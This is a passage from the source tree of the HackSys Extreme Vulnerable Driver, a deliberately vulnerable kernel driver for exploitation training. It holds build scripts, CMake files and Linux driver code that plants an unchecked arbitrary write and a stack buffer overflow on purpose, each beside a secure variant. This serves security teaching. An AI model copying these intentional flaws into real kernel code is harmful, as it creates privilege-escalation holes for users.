85 | echo [+] Cleaning build directory
86 | for /r "%BUILD_DIR%" %%a in (*) do (
87 | if not %%~xa==.sys (
88 | if not %%~xa==.pdb (
89 | if not %%~xa==.inf (
90 | if not %%~xa==.cat (
91 | del /f /q "%%a"
92 | )
93 | )
94 | )
95 | )
96 | )
97 |
98 | rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
99 | rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
100 | echo.
101 |
102 | echo [+] Built vulnerable HackSys Extreme Vulnerable Driver successfully
103 | cd %CURRENT_DIR%
104 | echo.
105 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Vulnerable_x64.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo.
3 | echo # # ##### #######
4 | echo # # ## #### # # # # # # #### # ###### ## # #
5 | echo # # # # # # # # # # # # # # # # ## ##
6 | echo ####### # # # #### ##### # #### # ##### # # # ## #
7 | echo # # ###### # # # # # # # # ###### # #
8 | echo # # # # # # # # # # # # # # # # # # #
9 | echo # # # # #### # # ##### # #### # ###### # # # #
10 | echo.
11 | echo HackSys Extreme Vulnerable Driver Build Utility
12 | echo.
13 |
14 | rem Store the current directory path
15 | set BUILD_ARCH=x64
16 | set CURRENT_DIR=%cd%
17 | set PROJECT_NAME=HEVD
18 | set PROJECT_DIR=%CURRENT_DIR%\..\Driver\
19 |
20 | rem Get the normalized path
21 | for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"
22 |
23 | set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\vulnerable\%BUILD_ARCH%
24 |
25 | rem VS2017U2 contains vswhere.exe
26 | if "%VSWHERE%"=="" (
27 | set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
28 | )
29 |
30 | for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
31 | set VS_INSTALL_DIR=%%i
32 | )
33 |
34 | echo [+] Visual Studio Path: %VS_INSTALL_DIR%
35 |
36 | set VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat
37 |
38 | echo [+] Executing: %VSDEVCMD_PATH%
39 |
40 | echo.
41 | @call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH%
42 | echo.
43 |
44 | echo [+] Build target architecture: %BUILD_ARCH%
45 | echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
46 | echo [+] Build directory: %BUILD_DIR%
47 | echo [+] Removing build directory
48 |
49 | if exist %BUILD_DIR% (
50 | rmdir /S /Q "%BUILD_DIR%"
51 | )
52 |
53 | echo [+] Creating build directory
54 |
55 | mkdir "%BUILD_DIR%"
56 | cd %BUILD_DIR%
57 |
58 | echo [+] Generating build configuration files
59 |
60 | cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" "%PROJECT_DIR%"
61 |
62 | echo.
63 | echo [+] Building vulnerable HackSys Extreme Vulnerable Driver
64 | echo.
65 |
66 | CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v"
67 | echo.
68 |
69 | echo [+] Copying built files
70 |
71 | echo [*] %PROJECT_NAME%.sys
72 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%"
73 |
74 | echo [*] %PROJECT_NAME%.pdb
75 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"
76 |
77 | echo [*] %PROJECT_NAME%.cat
78 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"
79 |
80 | echo [*] %PROJECT_NAME%.inf
81 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
82 | echo.
83 |
84 |
85 | echo [+] Cleaning build directory
86 | for /r "%BUILD_DIR%" %%a in (*) do (
87 | if not %%~xa==.sys (
88 | if not %%~xa==.pdb (
89 | if not %%~xa==.inf (
90 | if not %%~xa==.cat (
91 | del /f /q "%%a"
92 | )
93 | )
94 | )
95 | )
96 | )
97 |
98 | rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
99 | rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
100 | echo.
101 |
102 | echo [+] Built vulnerable HackSys Extreme Vulnerable Driver successfully
103 | cd %CURRENT_DIR%
104 | echo.
105 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Vulnerable_x64.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | BANNER="
4 | # # ##### #######
5 | # # ## #### # # # # # # #### # ###### ## # #
6 | # # # # # # # # # # # # # # # # ## ##
7 | ####### # # # #### ##### # #### # ##### # # # ## #
8 | # # ###### # # # # # # # # ###### # #
9 | # # # # # # # # # # # # # # # # # # #
10 | # # # # #### # # ##### # #### # ###### # # # #
11 |
12 | HackSys Extreme Vulnerable Driver Build Utility
13 | "
14 |
15 | echo "${BANNER}"
16 |
17 | # Standard constants
18 | BUILD_ARCH=x64
19 | CURRENT_DIR=$PWD
20 | PROJECT_NAME=hevd
21 | PROJECT_DIR="$(realpath -m ${CURRENT_DIR}/../Driver)"
22 | BUILD_DIR="$(realpath -m ${PROJECT_DIR}/../_build)"
23 | BINARY_DIR="$(realpath -m ${PROJECT_DIR}/../build/driver/linux/vulnerable/${BUILD_ARCH})"
24 |
25 | echo "[+] Build target architecture: ${BUILD_ARCH}"
26 | echo "[+] Host Architecture: $(uname -m)"
27 | echo "[+] Build directory: ${BUILD_DIR}"
28 | echo "[+] Binary directory: ${BINARY_DIR}"
29 | echo "[+] Removing build & binary directory"
30 |
31 | if [ -d "${BUILD_DIR}" ]; then
32 | rm -rfd ${BUILD_DIR}
33 | fi
34 |
35 | if [ -d "${BINARY_DIR}" ]; then
36 | rm -rfd ${BINARY_DIR}
37 | fi
38 |
39 | echo "[+] Creating build directory"
40 |
41 | mkdir -p ${BUILD_DIR}
42 | cd ${BUILD_DIR}
43 |
44 | echo "[+] Generating build configuration files"
45 |
46 | $(which cmake) -G "Unix Makefiles" "${PROJECT_DIR}"
47 |
48 | echo
49 | echo "[+] Building vulnerable HackSys Extreme Vulnerable Driver"
50 | echo
51 |
52 | $(which make)
53 | echo
54 |
55 | echo "[+] Creating binary directory"
56 | mkdir -p ${BINARY_DIR}
57 |
58 | echo "[+] Copying built files"
59 |
60 | echo "[*] ${PROJECT_NAME}.ko"
61 | mv -f "${BUILD_DIR}/${PROJECT_NAME}.ko" "${BINARY_DIR}"
62 | echo
63 |
64 | echo "[+] Cleaning build directory"
65 |
66 | $(which make) clean
67 | rm -rf ${BUILD_DIR}
68 |
69 | echo "[+] Built vulnerable HackSys Extreme Vulnerable Driver successfully"
70 | echo
71 |
--------------------------------------------------------------------------------
/Builder/Build_HEVD_Vulnerable_x86.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo.
3 | echo # # ##### #######
4 | echo # # ## #### # # # # # # #### # ###### ## # #
5 | echo # # # # # # # # # # # # # # # # ## ##
6 | echo ####### # # # #### ##### # #### # ##### # # # ## #
7 | echo # # ###### # # # # # # # # ###### # #
8 | echo # # # # # # # # # # # # # # # # # # #
9 | echo # # # # #### # # ##### # #### # ###### # # # #
10 | echo.
11 | echo HackSys Extreme Vulnerable Driver Build Utility
12 | echo.
13 |
14 | rem Store the current directory path
15 | set BUILD_ARCH=x86
16 | set CURRENT_DIR=%cd%
17 | set PROJECT_NAME=HEVD
18 | set PROJECT_DIR=%CURRENT_DIR%\..\Driver\
19 |
20 | rem Get the normalized path
21 | for %%i in ("%PROJECT_DIR%") do SET "PROJECT_DIR=%%~fi"
22 |
23 | set BUILD_DIR=%PROJECT_DIR%..\build\driver\windows\vulnerable\%BUILD_ARCH%
24 |
25 | rem VS2017U2 contains vswhere.exe
26 | if "%VSWHERE%"=="" (
27 | set "VSWHERE=%ProgramFiles(x86)%\Microsoft Visual Studio\Installer\vswhere.exe"
28 | )
29 |
30 | for /f "usebackq tokens=*" %%i in (`"%VSWHERE%" -latest -products * -requires Microsoft.Component.MSBuild -property installationPath`) do (
31 | set VS_INSTALL_DIR=%%i
32 | )
33 |
34 | echo [+] Visual Studio Path: %VS_INSTALL_DIR%
35 |
36 | set VSDEVCMD_PATH=%VS_INSTALL_DIR%\Common7\Tools\VsDevCmd.bat
37 |
38 | echo [+] Executing: %VSDEVCMD_PATH%
39 |
40 | echo.
41 | @call "%VSDEVCMD_PATH%" -arch=%BUILD_ARCH%
42 | echo.
43 |
44 | echo [+] Build target architecture: %BUILD_ARCH%
45 | echo [+] Host Architecture: %PROCESSOR_ARCHITECTURE%
46 | echo [+] Build directory: %BUILD_DIR%
47 | echo [+] Removing build directory
48 |
49 | if exist %BUILD_DIR% (
50 | rmdir /S /Q "%BUILD_DIR%"
51 | )
52 |
53 | echo [+] Creating build directory
54 |
55 | mkdir "%BUILD_DIR%"
56 | cd %BUILD_DIR%
57 |
58 | echo [+] Generating build configuration files
59 |
60 | cmake.exe -G "Ninja" -DCMAKE_INSTALL_PREFIX:PATH="%BUILD_DIR%" -DCMAKE_BUILD_TYPE="Release" "%PROJECT_DIR%"
61 |
62 | echo.
63 | echo [+] Building vulnerable HackSys Extreme Vulnerable Driver
64 | echo.
65 |
66 | CMake.exe --build "%BUILD_DIR%" --config Release --clean-first -- "-v"
67 | echo.
68 |
69 | echo [+] Copying built files
70 |
71 | echo [*] %PROJECT_NAME%.sys
72 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.sys" "%BUILD_DIR%"
73 |
74 | echo [*] %PROJECT_NAME%.pdb
75 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.pdb" "%BUILD_DIR%"
76 |
77 | echo [*] %PROJECT_NAME%.cat
78 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.cat" "%BUILD_DIR%"
79 |
80 | echo [*] %PROJECT_NAME%.inf
81 | move /Y "%BUILD_DIR%\%PROJECT_NAME%\Windows\%PROJECT_NAME%.inf" "%BUILD_DIR%"
82 | echo.
83 |
84 |
85 | echo [+] Cleaning build directory
86 | for /r "%BUILD_DIR%" %%a in (*) do (
87 | if not %%~xa==.sys (
88 | if not %%~xa==.pdb (
89 | if not %%~xa==.inf (
90 | if not %%~xa==.cat (
91 | del /f /q "%%a"
92 | )
93 | )
94 | )
95 | )
96 | )
97 |
98 | rmdir /S /Q "%BUILD_DIR%\%PROJECT_NAME%"
99 | rmdir /S /Q "%BUILD_DIR%\CMakeFiles"
100 | echo.
101 |
102 | echo [+] Built vulnerable HackSys Extreme Vulnerable Driver successfully
103 | cd %CURRENT_DIR%
104 | echo.
105 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | Contributing to HackSys Extreme Vulnerable Driver
2 | =================================================
3 |
4 | To contribute code to **HackSys Extreme Vulnerable Driver (HEVD)** project, please use pull requests via **GitHub**.
5 |
6 | ## Thank you
7 |
8 |
9 | ------------------------------------------------------------------------
10 |
11 | [](https://hacksys.io)
12 |
--------------------------------------------------------------------------------
/Driver/CMake/DetectOS.cmake:
--------------------------------------------------------------------------------
1 | #
2 | # This script is used to detect the OS and architecture of the host system
3 | #
4 |
5 | # Detect host architecture
6 | if(CMAKE_C_PLATFORM_ID STREQUAL "Windows")
7 | if(CMAKE_C_COMPILER_ARCHITECTURE_ID STREQUAL "X86")
8 | set(HOST_ARCH_X86 TRUE BOOL)
9 | set(HOST_PLATFORM "x86")
10 | elseif(CMAKE_C_COMPILER_ARCHITECTURE_ID STREQUAL "x64")
11 | set(HOST_ARCH_X64 TRUE BOOL)
12 | set(HOST_PLATFORM "x64")
13 | elseif(CMAKE_C_COMPILER_ARCHITECTURE_ID STREQUAL "ARM64")
14 | set(HOST_ARCH_ARM64 TRUE BOOL)
15 | set(HOST_PLATFORM "arm64")
16 | endif()
17 | elseif(CMAKE_C_PLATFORM_ID STREQUAL "Linux")
18 | if(CMAKE_SIZEOF_VOID_P EQUAL 4)
19 | set(HOST_ARCH_X86 TRUE BOOL)
20 | set(HOST_PLATFORM "x86")
21 | elseif(CMAKE_SIZEOF_VOID_P EQUAL 8)
22 | set(HOST_ARCH_X64 TRUE BOOL)
23 | set(HOST_PLATFORM "x64")
24 | endif()
25 | endif()
26 |
27 | # Detect host operating system
28 | string(REGEX MATCH "Linux" HOST_OS_LINUX ${CMAKE_SYSTEM_NAME})
29 |
30 | if(WIN32)
31 | set(HOST_OS_WINDOWS TRUE BOOL)
32 | endif()
33 |
--------------------------------------------------------------------------------
/Driver/CMake/LKM.cmake:
--------------------------------------------------------------------------------
1 | #
2 | # Linux Kernel Module Builder
3 | #
4 |
5 | # set the kernel build directory
6 | set(KERNEL_DIR "/lib/modules/${CMAKE_HOST_SYSTEM_VERSION}/build")
7 |
8 | message(STATUS "KERNEL_VERSION: ${CMAKE_HOST_SYSTEM_VERSION}")
9 | message(STATUS "KERNEL_DIR: ${KERNEL_DIR}")
10 |
11 |
12 | function(lkm_add_driver)
13 | cmake_parse_arguments(LKM "" "NAME" "" ${ARGN})
14 |
15 | # validate the module name
16 | if(NOT LKM_NAME)
17 | message(FATAL_ERROR "You should give a name to the module")
18 | return()
19 | else()
20 | string(TOLOWER ${LKM_NAME} MODULE_NAME)
21 | endif()
22 |
23 | # set the Kbuild command and file path
24 | set(KBUILD_COMMAND ${CMAKE_MAKE_PROGRAM} -C ${KERNEL_DIR} M=${CMAKE_BINARY_DIR} src=${CMAKE_SOURCE_DIR}/HEVD/${CMAKE_SYSTEM_NAME})
25 |
26 | set(KBUILD_FILE_PATH "${CMAKE_SOURCE_DIR}/HEVD/${CMAKE_SYSTEM_NAME}/Kbuild")
27 |
28 | # delete the obsolete Kbuild file if exists
29 | if(EXISTS ${KBUILD_FILE_PATH})
30 | message(STATUS "Deleting obsolete Kbuild: ${KBUILD_FILE_PATH}")
31 | file(REMOVE ${KBUILD_FILE_PATH})
32 | endif()
33 |
34 | # add the source object files to the Kbuild file
35 | foreach(MODULE_SOURCE_FILE ${LKM_UNPARSED_ARGUMENTS})
36 | get_filename_component(SOURCE_FILE ${MODULE_SOURCE_FILE} NAME_WE)
37 | file(APPEND ${KBUILD_FILE_PATH} "${MODULE_NAME}-m += ${SOURCE_FILE}.o\n")
38 | endforeach()
39 |
40 | file(APPEND ${KBUILD_FILE_PATH} "obj-m += ${MODULE_NAME}.o\n")
41 |
42 | # disable -Wframe-larger-than= warning in GCC
43 | file(APPEND ${KBUILD_FILE_PATH} "ccflags-y := -Wframe-larger-than=65535\n")
44 |
45 | # if we are building secure version, then set the flag
46 | if(SECURE)
47 | file(APPEND ${KBUILD_FILE_PATH} "ccflags-y += -DSECURE\n")
48 | endif()
49 |
50 | message(STATUS "Wrote new Kbuild: ${KBUILD_FILE_PATH}")
51 |
52 | # set the output module path
53 | set(MODULE_BIN_FILE "${CMAKE_BINARY_DIR}/${MODULE_NAME}.ko")
54 |
55 | add_custom_target(
56 | ${MODULE_NAME}
57 | ALL COMMAND ${KBUILD_COMMAND} modules
58 | COMMENT "Compiling Linux Kernel Module: ${MODULE_BIN_FILE}"
59 | )
60 |
61 | set_property(DIRECTORY APPEND PROPERTY ADDITIONAL_MAKE_CLEAN_FILES ${KBUILD_FILE_PATH} ${CMAKE_BINARY_DIR})
62 |
63 | endfunction()
64 |
--------------------------------------------------------------------------------
/Driver/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | #
2 | # HEVD CMake Script
3 | #
4 |
5 | cmake_minimum_required (VERSION 3.8)
6 |
7 | message(
8 | "
9 | ## ## ######## ## ## ########
10 | ## ## ## ## ## ## ##
11 | ## ## ## ## ## ## ##
12 | ######### ###### ## ## ## ##
13 | ## ## ## ## ## ## ##
14 | ## ## ## ## ## ## ##
15 | ## ## ######## ### ########
16 |
17 | HackSys Extreme Vulnerable Driver
18 | "
19 | )
20 |
21 | project("HEVD" C)
22 |
23 | set(HEVD_VERSION "3.0")
24 | list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_LIST_DIR}/CMake")
25 |
26 | message("Detecting OS and Architecture")
27 | include(DetectOS)
28 |
29 | # validate supported OS
30 | if(HOST_OS_LINUX)
31 | message(STATUS "OS: Linux")
32 | elseif(HOST_OS_WINDOWS)
33 | message(STATUS "OS: Windows")
34 | else()
35 | message(FATAL_ERROR "Unsupported OS")
36 | return()
37 | endif()
38 |
39 | # Validate supported architecture
40 | if(HOST_ARCH_X64)
41 | message(STATUS "Architecture: x64")
42 | elseif(HOST_ARCH_X86)
43 | message(STATUS "Architecture: x86")
44 | elseif(HOST_ARCH_ARM64)
45 | message(STATUS "Architecture: arm64")
46 | else()
47 | message(FATAL_ERROR "Unsupported architecture")
48 | return()
49 | endif()
50 |
51 | if(HOST_OS_WINDOWS)
52 | message("Locating Windows Driver Kit")
53 | include(WDK)
54 | elseif(HOST_OS_LINUX)
55 | message("Locating Linux Kernel Module Builder")
56 | include(LKM)
57 | endif()
58 |
59 | add_subdirectory("HEVD")
60 |
--------------------------------------------------------------------------------
/Driver/HEVD/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | #
2 | # Intermediate CMakeLists to add OS dependent directories
3 | #
4 |
5 | if(HOST_OS_WINDOWS)
6 | add_subdirectory("Windows")
7 | elseif(HOST_OS_LINUX)
8 | add_subdirectory("Linux")
9 | endif()
10 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/ArbitraryWrite.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryWrite.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | arbitrary write vulnerability in the kernel
48 |
49 | --*/
50 |
51 | #include "ArbitraryWrite.h"
52 |
53 |
54 | /**
55 | * @param[in] user_write_what_where the pointer to WRITE_WHAT_WHERE structure
56 | * @return status code
57 | */
58 | int trigger_arbitrary_write(PWRITE_WHAT_WHERE user_write_what_where)
59 | {
60 | void *what = NULL;
61 | void *where = NULL;
62 | int status = STATUS_SUCCESS;
63 |
64 | if (!x_access_ok(VERIFY_READ, user_write_what_where, sizeof(WRITE_WHAT_WHERE)))
65 | {
66 | ERR("[-] Invalid parameters");
67 |
68 | status = -EINVAL;
69 | return status;
70 | }
71 |
72 | what = user_write_what_where->What;
73 | where = user_write_what_where->Where;
74 |
75 | INFO("[+] user_write_what_where: 0x%p\n", user_write_what_where);
76 | INFO("[+] WRITE_WHAT_WHERE size: 0x%zX\n", sizeof(WRITE_WHAT_WHERE));
77 | INFO("[+] user_write_what_where->What: 0x%p\n", what);
78 | INFO("[+] user_write_what_where->Where: 0x%p\n", where);
79 |
80 | #ifdef SECURE
81 | /**
82 | * Secure Note: This is secure because the developer is properly validating if address
83 | * pointed by 'Where' and 'What' value resides in User mode
84 | */
85 |
86 | if (!x_access_ok(VERIFY_READ, what, sizeof(void *)) ||
87 | !x_access_ok(VERIFY_WRITE, where, sizeof(void *)))
88 | {
89 | ERR("[-] Invalid parameters");
90 |
91 | status = -EINVAL;
92 | return status;
93 | }
94 |
95 | #endif
96 |
97 | INFO("[+] Triggering Arbitrary Write\n");
98 |
99 | /**
100 | * Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
101 | * because the developer is writing the value pointed by 'What' to memory location
102 | * pointed by 'Where' without properly validating if the values pointed by 'Where'
103 | * and 'What' resides in User mode
104 | */
105 |
106 | *((void **) where) = *((void **) what);
107 |
108 | return status;
109 | }
110 |
111 |
112 | /**
113 | * @param[in] io user space buffer
114 | * @return status code
115 | */
116 | int arbitrary_write_ioctl_handler(struct hevd_io *io)
117 | {
118 | int status = -EINVAL;
119 | PWRITE_WHAT_WHERE user_write_what_where = NULL;
120 |
121 | user_write_what_where = (PWRITE_WHAT_WHERE)io->input_buffer;
122 |
123 | if (user_write_what_where)
124 | {
125 | status = trigger_arbitrary_write(user_write_what_where);
126 | }
127 |
128 | return status;
129 | }
130 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/ArbitraryWrite.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryWrite.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | arbitrary write module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __ARBITRARY_WRITE_H__
54 | #define __ARBITRARY_WRITE_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
63 | typedef struct _WRITE_WHAT_WHERE
64 | {
65 | void *What;
66 | void *Where;
67 | } WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
74 | int trigger_arbitrary_write(PWRITE_WHAT_WHERE user_write_what_where);
75 |
76 | #endif // !__ARBITRARY_WRITE_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/BufferOverflowStack.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStack.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | buffer overflow in Stack vulnerability.
48 |
49 | --*/
50 |
51 | #include "BufferOverflowStack.h"
52 |
53 |
54 | /**
55 | * Trigger the buffer overflow in Stack Vulnerability
56 | *
57 | * @param[in] user_buffer the pointer to user mode buffer
58 | * @param[in] size size of the user mode buffer
59 | * @return status code
60 | */
61 | __attribute__((optimize("-fno-stack-protector")))
62 | int trigger_buffer_overflow_stack(void *user_buffer, size_t size)
63 | {
64 | int status = STATUS_SUCCESS;
65 | unsigned long kernel_buffer[BUFFER_SIZE] = { 0 };
66 |
67 | INFO("[+] user_buffer: 0x%p\n", user_buffer);
68 | INFO("[+] user_buffer size: 0x%zX\n", size);
69 | INFO("[+] kernel_buffer: 0x%p\n", &kernel_buffer);
70 | INFO("[+] kernel_buffer size: 0x%zX\n", sizeof(kernel_buffer));
71 |
72 | #ifdef SECURE
73 | /**
74 | * Secure Note: This is secure because the developer is passing a size
75 | * equal to size of kernel_buffer to `copy_from_user()`. Hence,
76 | * there will be no overflow
77 | */
78 |
79 | if (copy_from_user(kernel_buffer, user_buffer, sizeof(kernel_buffer)))
80 | {
81 | status = -EFAULT;
82 | }
83 | #else
84 | INFO("[+] Triggering Buffer Overflow in Stack\n");
85 |
86 | /**
87 | * Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
88 | * because the developer is passing the user supplied size directly to
89 | * `__copy_from_user()` without validating if the size is greater or
90 | * equal to the size of kernel_buffer
91 | */
92 |
93 | if (__copy_from_user(kernel_buffer, user_buffer, size))
94 | {
95 | status = -EFAULT;
96 | }
97 | #endif
98 |
99 | return status;
100 | }
101 |
102 |
103 | /**
104 | * Buffer Overflow Stack Ioctl Handler
105 | *
106 | * @param[in] io user space buffer
107 | * @return status code
108 | */
109 | int buffer_overflow_stack_ioctl_handler(struct hevd_io *io)
110 | {
111 | size_t size = 0;
112 | void *user_buffer = NULL;
113 | int status = -EINVAL;
114 |
115 | user_buffer = io->input_buffer;
116 | size = io->input_buffer_length;
117 |
118 | if (user_buffer)
119 | {
120 | status = trigger_buffer_overflow_stack(user_buffer, size);
121 | }
122 |
